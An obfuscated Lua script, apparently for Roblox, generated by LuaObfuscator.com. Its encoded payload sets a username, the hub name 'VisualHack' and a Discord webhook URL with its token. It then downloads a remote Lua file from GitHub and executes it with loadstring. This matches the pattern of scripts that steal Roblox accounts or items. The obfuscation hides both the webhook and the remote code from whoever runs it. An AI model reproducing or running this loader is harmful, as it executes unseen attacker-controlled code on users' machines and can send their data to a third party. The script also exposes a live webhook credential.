--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v75=v5(v67,v19);v19=nil;return v75;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v68-(v68%(878 -(282 + 595))) ;else local v69=619 -(555 + 64) ;local v70;while true do if (v69==(931 -(857 + (1711 -(1523 + 114))))) then v70=(570 -(330 + 37 + 201))^(v32-((1322 -394) -((1279 -(68 + 997)) + 713))) ;return (((v31%(v70 + v70))>=v70) and (1 + (1270 -(226 + 1044)))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -((75 -43) + 85))) then return (v37 * ((463 -212) + 5)) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;v35=1 -0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + 4 ;return (v41 * (16777396 -((164 -97) + 113))) + (v40 * (48056 + 17480)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,3 -2 ,15 + 5 ) * (2^(127 -95))) + v42 ;local v46=v20(v43,973 -((820 -(10 + 8)) + 150) ,83 -52 );local v47=((v20(v43,57 -25 )==(1 + 0)) and  -1) or 1 ;if (v46==(997 -(915 + (315 -233)))) then if (v45==(0 -0)) then return v47 * ((442 -(416 + 26)) + (0 -0)) ;else v46=1 -0 ;v44=1187 -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==((0 + 0) -0)) and (v47 * ((1 + (0 -0))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1461 -(145 + 293)) ) * (v44 + (v45/((2 + 0)^(843 -(368 + 423))))) ;end local function v25(v48)local v49=0 + 0 ;local v50;local v51;while true do if (v49==(433 -(44 + 386))) then return v6(v51);end if (v49==(1486 -(998 + 488))) then v50=nil;if  not v48 then v48=v23();if (v48==((0 -0) + (0 -0))) then return "";end end v49=1 + 0 ;end if (v49==(1 + 1)) then v51={};for v76=773 -(201 + 571) , #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=1141 -(116 + 1022) ;end if (v49==((1 + 0) -0)) then v50=v3(v16,v18,(v18 + v48) -(1081 -(1020 + (206 -146))) );v18=v18 + v48 ;v49=8 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(608 -(454 + 152))) then else local v71=0;while true do if (0~=v71) then else v57=nil;v58=nil;v71=1;end if ((1 -0)~=v71) then else v52=3;break;end end end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52~=(1291 -(993 + 295))) then else v59=nil;while true do local v78=0;while true do if (v78~=0) then else if (v53==1) then local v101=0;while true do if (v101==(1 + 0)) then for v109=1,v58 do local v110=0;local v111;local v112;local v113;while true do if (1~=v110) then else v113=nil;while true do if (v111~=0) then else v112=v21();v113=nil;v111=1172 -(418 + 753) ;end if (v111==(1 + 0)) then if (v112==1) then v113=v21()~=0 ;elseif (v112==(1 + 1)) then v113=v24();elseif (v112==3) then v113=v25();end v59[v109]=v113;break;end end break;end if (v110==(0 + 0)) then v111=0;v112=nil;v110=1 + 0 ;end end end v57[3]=v21();v101=531 -(406 + 123) ;end if (v101==(1771 -(1749 + 20))) then v53=2;break;end if ((0 + 0)~=v101) then else v58=v23();v59={};v101=1323 -(1249 + 73) ;end end end if (v53~=(0 + 0)) then else local v102=0;local v103;while true do if (v102~=0) then else v103=1145 -(466 + 679) ;while true do if (v103==(0 -0)) then local v123=0;while true do if (v123~=(2 -1)) then else v103=1901 -(106 + 1794) ;break;end if (v123==0) then v54={};v55={};v123=1;end end end if (v103==1) then local v124=0 + 0 ;while true do if (v124==(1 + 0)) then v103=2;break;end if (v124==0) then v56={};v57={v54,v55,nil,v56};v124=1;end end end if (v103==2) then v53=585 -(57 + 527) ;break;end end break;end end end v78=1428 -(41 + 1386) ;end if (v78~=(104 -(17 + 86))) then else if (v53==2) then local v104=0;while true do if (0~=v104) then else for v114=1 + 0 ,v23() do local v115=0 -0 ;local v116;local v117;local v118;while true do if (v115~=0) then else local v143=0;while true do if (v143~=(2 -1)) then else v115=1;break;end if (v143~=(166 -(122 + 44))) then else v116=0;v117=nil;v143=1 -0 ;end end end if ((3 -2)~=v115) then else v118=nil;while true do if (v116==(1 + 0)) then while true do if (v117~=0) then else v118=v21();if (v20(v118,1 + 0 ,1)~=(0 -0)) then else local v156=65 -(30 + 35) ;local v157;local v158;local v159;local v160;local v161;local v162;while true do if (v156~=(3 + 0)) then else while true do if (2==v157) then v162=nil;while true do if ((1259 -(1043 + 214))~=v158) then else while true do if (v159~=(7 -5)) then else local v177=1212 -(323 + 889) ;while true do if (v177~=(0 -0)) then else local v185=580 -(361 + 219) ;while true do if (v185~=(320 -(53 + 267))) then else if (v20(v161,1 + 0 ,414 -(15 + 398) )==(983 -(18 + 964))) then v162[2]=v59[v162[7 -5 ]];end if (v20(v161,2 + 0 ,2 + 0 )==1) then v162[853 -(20 + 830) ]=v59[v162[3 + 0 ]];end v185=1;end if (v185~=1) then else v177=127 -(116 + 10) ;break;end end end if (v177~=1) then else v159=1 + 2 ;break;end end end if (v159==(738 -(542 + 196))) then local v178=0;local v179;while true do if (v178==(0 -0)) then v179=0;while true do if (v179~=(0 + 0)) then else local v187=0 + 0 ;while true do if (v187~=1) then else v179=1;break;end if (v187==(0 + 0)) then v160=v20(v118,4 -2 ,7 -4 );v161=v20(v118,1555 -(1126 + 425) ,411 -(118 + 287) );v187=3 -2 ;end end end if (v179==1) then v159=1122 -(118 + 1003) ;break;end end break;end end end if (v159==(2 -1)) then local v180=0;local v181;while true do if (v180~=(377 -(142 + 235))) then else v181=0 -0 ;while true do if (v181~=0) then else local v188=0;while true do if (v188~=(1 + 0)) then else v181=1;break;end if (v188~=0) then else v162={v22(),v22(),nil,nil};if (v160==0) then local v193=0 + 0 ;local v194;local v195;local v196;while true do if ((1 + 0)==v193) then v196=nil;while true do if ((1 + 0)==v194) then while true do if (v195~=(0 + 0)) then else v196=0 + 0 ;while true do if (0==v196) then v162[6 -3 ]=v22();v162[4]=v22();break;end end break;end end break;end if (v194==(0 -0)) then local v199=0 -0 ;while true do if (v199==1) then v194=1 + 0 ;break;end if (v199==(0 -0)) then v195=753 -(239 + 514) ;v196=nil;v199=1 + 0 ;end end end end break;end if (v193==(1329 -(797 + 532))) then v194=0;v195=nil;v193=1;end end elseif (v160==1) then v162[3 + 0 ]=v23();elseif (v160==2) then v162[2 + 1 ]=v23() -(2^(37 -21)) ;elseif (v160~=3) then else local v200=1202 -(373 + 829) ;local v201;while true do if (v200~=0) then else v201=0;while true do if (v201~=(731 -(476 + 255))) then else v162[1133 -(369 + 761) ]=v23() -((2 + 0)^16) ;v162[4]=v22();break;end end break;end end end v188=1 -0 ;end end end if (v181~=(1 -0)) then else v159=240 -(64 + 174) ;break;end end break;end end end if (v159==(1 + 2)) then if (v20(v161,3 -0 ,339 -(144 + 192) )~=1) then else v162[4]=v59[v162[4]];end v54[v114]=v162;break;end end break;end if (0==v158) then local v174=216 -(42 + 174) ;while true do if ((0 + 0)==v174) then v159=0 + 0 ;v160=nil;v174=1;end if (v174==(1 + 0)) then v158=1;break;end end end if (v158~=1) then else local v175=0;local v176;while true do if (v175==0) then v176=0;while true do if (v176~=1) then else v158=2;break;end if (v176~=(1504 -(363 + 1141))) then else local v186=1580 -(1183 + 397) ;while true do if ((0 -0)~=v186) then else v161=nil;v162=nil;v186=1 + 0 ;end if (1==v186) then v176=1 + 0 ;break;end end end end break;end end end end break;end if ((1975 -(1913 + 62))~=v157) then else local v172=0;while true do if (v172~=0) then else v158=0;v159=nil;v172=1;end if (v172==(1 + 0)) then v157=2 -1 ;break;end end end if (v157~=(1934 -(565 + 1368))) then else local v173=0 -0 ;while true do if (v173~=(1661 -(1477 + 184))) then else v160=nil;v161=nil;v173=1;end if (v173==(1 -0)) then v157=2 + 0 ;break;end end end end break;end if (2~=v156) then else v161=nil;v162=nil;v156=3;end if (v156==1) then v159=nil;v160=nil;v156=858 -(564 + 292) ;end if (v156==(0 -0)) then v157=0 -0 ;v158=nil;v156=1;end end end break;end end break;end if (v116==0) then local v149=0;local v150;while true do if (v149~=(304 -(244 + 60))) then else v150=0;while true do if ((1 + 0)~=v150) then else v116=477 -(41 + 435) ;break;end if (0==v150) then local v167=1001 -(938 + 63) ;while true do if (v167~=1) then else v150=1 + 0 ;break;end if (v167==(1125 -(936 + 189))) then v117=0 + 0 ;v118=nil;v167=1614 -(1565 + 48) ;end end end end break;end end end end break;end end end for v119=1 + 0 ,v23() do v55[v119-(1139 -(782 + 356)) ]=v28();end v104=268 -(176 + 91) ;end if (v104~=(2 -1)) then else for v121=1 -0 ,v23() do v56[v121]=v23();end return v57;end end end break;end end end break;end if (v52~=(1092 -(975 + 117))) then else v53=1875 -(157 + 1718) ;v54=nil;v52=1;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v12("#",...) -1 ;local function v83()local v84=v64;local v85=v65;local v86=v66;local v87=v27;local v88={};local v89={};local v90={};for v94=0,v82 do if ((v94>=v86) or (3076>3183)) then v88[v94-v86 ]=v81[v94 + 1 ];else v90[v94]=v81[v94 + 1 + 0 ];end end local v91=(v82-v86) + (3 -2) ;local v92;local v93;while true do local v95=0 -0 ;while true do if (((2220 -(697 + (615 -294)))>(2881 -1823)) and (v95==(1 -0))) then if (((8555 -4844)>(1306 + (2518 -(270 + 199)))) and (v93<=(5 -2))) then if ((v93<=(2 -1)) or (906>=((1121 + 2335) -(322 + 905)))) then if (((3107 -(580 + 1239))>1251) and (v93>(611 -(602 + 9)))) then v90[v92[2]]=v62[v92[1192 -(449 + 740) ]];else local v127=0;local v128;local v129;local v130;local v131;while true do if ((v127==(872 -(826 + (136 -90)))) or (4513<(4299 -(245 + 702)))) then v128=v92[6 -(4 + 0) ];v129,v130=v87(v90[v128](v13(v90,v128 + 1 + 0 ,v92[1 + 2 ])));v127=1;end if ((v127==(1900 -(260 + 1638))) or ((2505 -(382 + 58))>=(10252 -7056))) then for v151=v128,v80 do local v152=0 + 0 ;local v153;local v154;while true do if (((0 -0)==v152) or (((5667 + 7340) -8631)<=(2686 -((2354 -1452) + 303)))) then v153=0;v154=nil;v152=(1 + 0) -0 ;end if (((2 -1)==v152) or ((292 + (4267 -(645 + 522)))>=(6431 -(1121 + 569)))) then while true do if ((3325>=(2368 -(22 + 192))) and (v153==0)) then v154=683 -(483 + 200) ;while true do if ((((3253 -(1010 + 780)) -(1404 + 59))==v154) or ((3544 -2249)>=(4344 -1111))) then v131=v131 + (766 -(468 + 297 + 0)) ;v90[v151]=v129[v131];break;end end break;end end break;end end end break;end if ((4377>(2204 -(334 + 228))) and (v127==(3 -2))) then local v145=0 -0 ;while true do if (((8565 -3842)>(386 + 970)) and (v145==(237 -((671 -530) + 95)))) then v127=2;break;end if ((v145==(0 + 0)) or (((31194 -20549) -6509)<=(8252 -4819))) then v80=(v130 + v128) -(1 + 0) ;v131=0 -0 ;v145=1 + 0 ;end end end end end elseif (((2211 + 2034)<=(6521 -1890)) and (v93>(2 + 0))) then local v132=(1999 -(1045 + 791)) -(92 + 71) ;local v133;local v134;local v135;local v136;while true do if (((2113 + 2163)>=((16655 -10075) -(4070 -1404))) and (v132==2)) then while true do if (((963 -(574 + (696 -(351 + 154))))<=(3601 + 764)) and (v133==(2 -1))) then v136=nil;while true do if ((((4017 -(1281 + 293)) + (2605 -(28 + 238)))>(5525 -(254 + 595))) and (v134==(126 -(55 + 71)))) then local v163=0 -0 ;while true do if ((4864>(3987 -(573 + 1217))) and (v163==(2 -1))) then v134=1;break;end if ((v163==0) or (3700==(191 + 2316))) then v135=v92[2];v136=v90[v92[4 -1 ]];v163=940 -(714 + 225) ;end end end if (((13074 -8600)>=(381 -107)) and (v134==((2 -1) + 0))) then v90[v135 + (1 -0) ]=v136;v90[v135]=v136[v92[810 -(118 + 688) ]];break;end end break;end if ((v133==(48 -(25 + 23))) or (1894<=(273 + 1133))) then local v155=1886 -(927 + 959) ;while true do if (((5298 -3726)>=(2263 -(16 + 716))) and (v155==(0 -0))) then v134=97 -(11 + 86) ;v135=nil;v155=1560 -(1381 + 178) ;end if ((v155==(2 -1)) or ((4972 -(175 + 110))<(11467 -6925))) then v133=4 -3 ;break;end end end end break;end if ((3291>1667) and (v132==(1796 -(503 + 1293)))) then v133=0 -0 ;v134=nil;v132=1 + 0 ;end if ((v132==(1062 -(760 + 50 + 251))) or ((606 + 267)==(625 + 1409))) then v135=nil;v136=nil;v132=2 + 0 ;end end else v90[v92[535 -(43 + 490) ]]=v92[736 -(574 + 137 + 22) ];end elseif ((v93<=(3 + 2)) or ((9707 -6891)<(42 -(17 + 14)))) then if ((((5028 -(381 + 89)) -(240 + 619))<(1136 + 3570)) and (v93>4)) then v90[v92[2 -0 ]]();else do return;end end elseif (((176 + 2191 + 279)>=(2620 -(1344 + 400))) and (v93>(411 -(255 + 150)))) then local v139=0 + 0 ;local v140;while true do if (((329 + 285)<=3184) and ((0 -0)==v139)) then v140=v92[6 -4 ];v90[v140]=v90[v140](v13(v90,v140 + 1 ,v80));break;end end else v90[v92[1741 -(404 + 1335) ]][v92[409 -(183 + 223) ]]=v92[4];end v79=v79 + (1 -0) ;break;end if (((2072 + 1054)==(1125 + 1354 + 647)) and (v95==(337 -(10 + (559 -232))))) then local v105=1156 -(1074 + 82) ;while true do if ((((1 -0) + 0)==v105) or ((2525 -(118 + 220))>=(1651 + 3303))) then v95=450 -(108 + (2125 -(214 + 1570))) ;break;end if ((v105==0) or (((3197 -(990 + 465)) + 2135)==(1474 + 2101))) then v92=v84[v79];v93=v92[(2 + 2) -3 ];v105=(1453 + 41) -((2798 -2087) + (2508 -(1668 + 58))) ;end end end end end end A,B=v27(v11(v83));if  not A[1] then local v96=v60[4][v79] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030A3O0048696472614C6172636803073O004875624E616D65030A3O0056697375616C4861636B030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O36353438313534303632372O3635392F304C5578616A4A50324A334F59426647597066374C694B6E596A3345527236346A7361476E6B325934484155664F3932414F767A4A663450556A45616779653142506C56030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012013O00013O0030063O000200030012013O00013O0030063O000400050012013O00013O0030063O000600070012013O00083O001201000100093O00200300010001000A0012020003000B6O000100034O00075O00022O00053O000100012O00043O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
